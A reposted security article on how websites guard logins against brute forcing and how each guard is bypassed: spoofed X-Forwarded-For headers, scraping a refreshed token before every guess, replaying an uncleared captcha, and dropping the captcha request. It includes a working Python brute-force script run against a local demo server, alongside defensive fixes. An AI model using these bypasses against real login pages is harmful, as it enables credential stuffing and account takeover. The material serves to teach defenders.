
Protection against repeated request submission and how to bypass it

2022-06-11 04:04:00 Sword-heart

0x00. Preface


At present the main problems caused by repeated request submission are credential stuffing (replaying leaked username/password pairs against other sites) and brute forcing. As more and more password databases leak, the impact of these problems keeps growing, so most websites now have some protection against repeated submission. Some of that protection is imperfect, though, and can be bypassed.

0x01. IP-based protection


Many websites try to avoid repeated submission by limiting the number of attempts per IP: after n failures, that IP is temporarily blocked from using the function.

Most PHP websites obtain the client IP from $_SERVER['HTTP_X_FORWARDED_FOR'] or $_SERVER['HTTP_CLIENT_IP'] (PHP only). Seeing these two variables, everyone will think of the HTTP headers X-Forwarded-For and Client-IP: PHP fills them straight from whatever the request carries, so we can set these two headers ourselves in the request to bypass the limit.

http://zone.wooyun.org/content/12716
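The following is an added Python example, not code from the article: a login limiter keyed on the client IP, written once with the X-Forwarded-For / Client-IP lookup the article describes and once so that those headers are honoured only when the request actually arrived through one of our own proxies (`trusted_proxies` is an assumed configuration value, the attacker and proxy addresses are constructed). Rotating the header defeats the first version; against the second the attacker is locked out after MAX_FAILURES attempts whether or not a proxy sits in front of the site.

```python
"""IP-keyed login limiter: header-trusting lookup vs. trusted-proxy lookup.
Added example, not from the original article."""
import ipaddress
from collections import defaultdict

MAX_FAILURES = 5


def client_ip_naive(environ):
    """The pattern the article criticises: whatever the client sends wins."""
    for key in ("HTTP_X_FORWARDED_FOR", "HTTP_CLIENT_IP"):
        if environ.get(key):
            return environ[key].split(",")[0].strip()
    return environ["REMOTE_ADDR"]


def client_ip_trusted(environ, trusted_proxies):
    """Honour X-Forwarded-For only when the TCP peer is one of our proxies, then
    walk the list right-to-left past our own proxies; the first other hop is the client."""
    nets = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(addr):
        try:
            return any(ipaddress.ip_address(addr) in n for n in nets)
        except ValueError:          # not a valid address at all
            return False

    peer = environ["REMOTE_ADDR"]
    if not is_trusted(peer):
        return peer                 # direct connection: the header means nothing
    hops = [h.strip() for h in environ.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return peer             # garbage in the header: fall back to the peer
        if not is_trusted(hop):
            return hop
    return peer


class LoginLimiter:
    def __init__(self, ip_func):
        self.ip_func = ip_func
        self.failures = defaultdict(int)

    def attempt(self, environ, credentials_ok):
        """Return 'locked', 'ok' or 'fail' for one login attempt."""
        ip = self.ip_func(environ)
        if self.failures[ip] >= MAX_FAILURES:
            return "locked"
        if credentials_ok:
            self.failures[ip] = 0
            return "ok"
        self.failures[ip] += 1
        return "fail"


def simulate(ip_func, behind_proxy, attempts=20):
    """Constructed attacker at 198.51.100.7 sending a different X-Forwarded-For on every
    request; with behind_proxy the site sits behind our proxy 10.0.0.1, which appends the
    real source address. Returns how many attempts were actually evaluated."""
    limiter = LoginLimiter(ip_func)
    evaluated = 0
    for i in range(attempts):
        spoofed = "203.0.113.%d" % i
        if behind_proxy:
            environ = {"REMOTE_ADDR": "10.0.0.1",
                       "HTTP_X_FORWARDED_FOR": "%s, 198.51.100.7" % spoofed}
        else:
            environ = {"REMOTE_ADDR": "198.51.100.7", "HTTP_X_FORWARDED_FOR": spoofed}
        if limiter.attempt(environ, credentials_ok=False) == "fail":
            evaluated += 1
    return evaluated


if __name__ == "__main__":
    trusted = lambda e: client_ip_trusted(e, ["10.0.0.0/8"])
    print("naive, behind proxy:  ", simulate(client_ip_naive, True))
    print("trusted, behind proxy:", simulate(trusted, True))
    print("trusted, direct:      ", simulate(trusted, False))
```

Even the trusted-proxy version only raises the cost: an attacker with many source addresses still gets MAX_FAILURES guesses per address, so an IP limit should be combined with per-account limits rather than relied on alone.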

0x02. Token-based protection


  1. Token in the cookie. If the token lives in a cookie, the protection is meaningless, because the cookie is under the user's control.

  2. Token in the session

    A token kept in the session can be further divided into two cases.

    In one, the token is never changed: every submission uses the same token, so there is no protection at all.

    In the other, the token is refreshed after every submission. The code looks like this:

<code>#!php
// Token is refreshed on every submission, but it is only compared for equality:
// a fresh token can always be read from the form before each attempt.
if($_SESSION['token']==$_POST['token']){
    refreshToken();
    if(isUser($_POST['username'],$_POST['password'])){
        echo 'Login successful';
    }else{
        echo 'Wrong account number or password';
    }
}else{
    echo 'token error';
}
</code>

In this case we cannot simply resend a captured request. But because the token has to be submitted in the POST, we can first fetch the page, match the token out of the form, and then submit it together with the next guess: one fetch-and-submit pair per attempt.
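Fetch-and-submit against the refreshed-token login above, as an added Python example (not code from the article). The server side is a small loopback HTTP endpoint that mirrors the PHP: it stores the token in a cookie-keyed server-side session, checks it, refreshes it, then checks the credentials. The attacker keeps the session cookie, scrapes the current token from the form before every POST and so is never stopped by the refresh. The account, password list and port handling are constructed for the demo.

```python
"""Token-per-submission login (modelled on the article's PHP) and the
scrape-then-submit brute force that defeats it. Added example, not from the article."""
import re
import secrets
import threading
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

USERS = {"admin": "hunter2"}                              # constructed test account
SESSIONS = {}                                             # server-side store: sid -> {"token": ...}
WORDLIST = ["123456", "password", "hunter2", "letmein"]   # constructed


class LoginHandler(BaseHTTPRequestHandler):
    """GET returns the form with a hidden token; POST checks token, refreshes it, checks creds."""

    def log_message(self, *args):          # keep the demo quiet
        pass

    def _session(self):
        cookie = SimpleCookie(self.headers.get("Cookie", ""))
        sid = cookie["sid"].value if "sid" in cookie else None
        if sid not in SESSIONS:
            sid = secrets.token_hex(8)
            SESSIONS[sid] = {"token": secrets.token_hex(16)}
        return sid, SESSIONS[sid]

    def _reply(self, sid, body):
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Set-Cookie", "sid=%s; Path=/" % sid)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_GET(self):
        sid, sess = self._session()
        self._reply(sid, '<form method="post"><input type="hidden" name="token" value="%s">'
                         '<input name="username"><input name="password"></form>' % sess["token"])

    def do_POST(self):
        sid, sess = self._session()
        form = parse_qs(self.rfile.read(int(self.headers.get("Content-Length", 0))).decode())
        field = lambda k: form.get(k, [""])[0]
        if sess["token"] != field("token"):
            self._reply(sid, "token error")
            return
        sess["token"] = secrets.token_hex(16)       # refreshToken(): the old token is now useless
        if USERS.get(field("username")) == field("password"):
            self._reply(sid, "Login successful")
        else:
            self._reply(sid, "Wrong account number or password")


TOKEN_RE = re.compile(r'name="token" value="([0-9a-f]+)"')


def fetch(url, cookie, data=None):
    """One request that carries and updates the session cookie; returns (body, cookie)."""
    headers = {"Cookie": cookie} if cookie else {}
    with urlopen(Request(url, data=data, headers=headers)) as resp:
        set_cookie = resp.headers.get("Set-Cookie")
        if set_cookie:
            cookie = set_cookie.split(";")[0]
        return resp.read().decode(), cookie


def brute_force(url, username, wordlist):
    """For every guess: fetch the form, scrape the current token, submit both together."""
    cookie = None
    for candidate in wordlist:
        page, cookie = fetch(url, cookie)
        token = TOKEN_RE.search(page).group(1)
        body = urlencode({"token": token, "username": username, "password": candidate}).encode()
        reply, cookie = fetch(url, cookie, body)
        if reply == "Login successful":
            return candidate
    return None


def run_demo():
    """Serve on a free loopback port, run the attack, return the password that worked."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/login" % server.server_address[1]
        return brute_force(url, "admin", WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

The token here is doing CSRF-style work, not rate limiting: it proves the request came from a freshly served form, which an automated client can obtain as easily as a browser. Only a per-account or per-source attempt limit actually slows the loop down.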

0x03. Captcha-based protection


1. Captcha in the cookie

Some websites write the value of the captcha into a cookie. Enter the correct captcha once, capture the request, and brute force with it.

For example, ecisp_home_seccode in the ESPCMS cookie.

2. Captcha in the session

Some programmers do not refresh the captcha after it has been checked.

The code looks like this :


<code>#!php
// The captcha is compared but never cleared or regenerated after the check,
// so one correct value keeps working for every later submission.
if($_SESSION['seccode']==$_POST['seccode']){
    if(isUser($_POST['username'],$_POST['password'])){
        echo 'Login successful';
    }else{
        echo 'Wrong account number or password';
    }
}else{
    echo 'Verification code error';
}
</code>

In this case we only need to enter the correct captcha once and capture the request; after that the request can be resent directly.

In addition, $_SESSION['seccode'] is usually assigned by the page that generates the captcha image, but some programmers never check whether $_SESSION['seccode'] has actually been set. If it has not, its value is null, and with the loose == comparison above null matches an empty submitted field.

In this case we can bypass the check as follows.

Clear the cookies, open Burp, then open the login page and simply drop the request that fetches the captcha image. Now $_SESSION['seccode'] is empty on the server side. Submit the form with an empty seccode field, capture the request, and brute force directly.

http://wooyun.org/bugs/wooyun-2014-080424
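The fix for the session token of 0x02 and the session captcha of this section is the same: treat the stored value as single-use, remove it from the session before comparing, and reject an absent or empty value (the case a dropped captcha request produces). The following Python is an added example of that check, not the article's code; `session` is assumed to be a dict-like server-side store, and the account, captcha text and password list are constructed for the demo.

```python
"""Single-use challenge check for a value kept in the server-side session
(the login token of 0x02 and the captcha of 0x03). Added example, not from the article."""
import hmac
import secrets

USERS = {"admin": "hunter2"}   # constructed test account


def issue_challenge(session, key, value=None):
    """Store a fresh challenge under `key`; a captcha generator passes its text as `value`."""
    value = value if value is not None else secrets.token_urlsafe(16)
    session[key] = value
    return value


def consume_challenge(session, key, submitted):
    """True only if `submitted` equals the stored value. The stored value is removed
    before comparing, whatever the outcome, so a captured answer cannot be replayed and
    a wrong password after a correct captcha still forces a new captcha."""
    expected = session.pop(key, None)
    if not expected or not isinstance(submitted, str) or not submitted:
        # Nothing issued (captcha request dropped) or empty field: reject explicitly.
        # PHP's loose `$_SESSION['seccode'] == $_POST['seccode']` passes here (null == "").
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def login(session, form):
    """Challenge first, credentials second; the order matters, see consume_challenge."""
    if not consume_challenge(session, "seccode", form.get("seccode")):
        return "verification code error"
    if USERS.get(form.get("username")) == form.get("password"):
        return "login successful"
    return "wrong account or password"


def replay_attempt():
    """Solve the captcha once, then resend the captured request with new passwords."""
    session = {}
    code = issue_challenge(session, "seccode", "sx4g")      # constructed captcha text
    return [login(session, {"seccode": code, "username": "admin", "password": p})
            for p in ["123456", "hunter2"]]


def dropped_captcha_attempt():
    """Never request the captcha image, then submit an empty seccode field."""
    session = {}
    return login(session, {"seccode": "", "username": "admin", "password": "hunter2"})


def honest_attempt():
    session = {}
    code = issue_challenge(session, "seccode", "sx4g")
    return login(session, {"seccode": code, "username": "admin", "password": "hunter2"})


if __name__ == "__main__":
    print(replay_attempt())            # second guess fails on the captcha, not the password
    print(dropped_captcha_attempt())   # rejected instead of matching null == ""
    print(honest_attempt())
```

This closes the replay and the empty-session cases; it does not by itself stop the fetch-and-submit loop of 0x02, where the attacker obtains a fresh challenge for every guess, so it still needs to sit behind an attempt limit.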

3. The captcha can be recognised automatically

I won't say much about this; WooYun has examples.

http://zone.wooyun.org/content/11826

4. Captcha design defects

The captcha design is flawed: under certain conditions it can be made to generate a specific value.

http://wooyun.org/bugs/wooyun-2014-080211

0x04. Protection based on predictable values


A few common cases:

  1. Verification by answering an assigned question. Common questions ask for the site's domain name, the site's title and so on. The randomness is far too weak: we set the answer to such a question as a fixed value and brute force. Even more directly, some pages print the answer in the page itself (for example, the site's domain name, "the answer is xxx.com"), in which case it is bypassed the same way as case 2.2 above.

  2. Arithmetic such as 1+1, 3+1 and so on.

  3. Some websites ask you to type only the digits, or only the letters, from the image. This reduces the randomness of the captcha: for the captcha sx4g, "the digits in the image" has only ten possible answers, so we set one of them as a fixed answer and test. The root cause in all of these is that the value, or its range, is predictable: we set a fixed value as the answer and test.

This article comes from the WooYun knowledge base; the copyright belongs to the WooYun knowledge base.

Original site

Copyright notice
This article was written by [Sword-heart]; when reposting, include the original link. Thanks.
https://yzsam.com/2022/162/202206110342123084.html